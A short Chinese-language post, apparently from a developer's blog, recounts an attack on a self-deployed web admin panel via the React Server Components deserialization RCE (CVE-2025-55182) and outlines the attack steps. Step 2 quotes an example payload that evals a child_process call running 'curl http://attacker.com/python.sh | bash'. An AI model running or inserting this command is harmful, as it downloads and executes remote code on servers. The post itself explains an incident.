原文链接:
https://www.rapid7.com/blog/post/etr-react2shell-cve-2025-55182-critical-unauthenticated-rce-affecting-react-server-components/
攻击者的恶意脚本:
https://gist.github.com/ripplek/c82170ea2627e7b8350ac0d434b03ed0
前段时间用 CC 写了一个应用的 Web 管理后台并部署在阿里云,结果周末就遭遇了攻击。
漏洞原理
React Server Components 的反序列化漏洞:
攻击步骤(概述)
1. 发现目标
2. 构造恶意 payload
// 恶意 RSC payload 中可能包含的示例
eval('require("child_process").exec("curl http://attacker.com/python.sh | bash")')
3. 发送攻击请求
4. 服务器执行
5. 后门建立

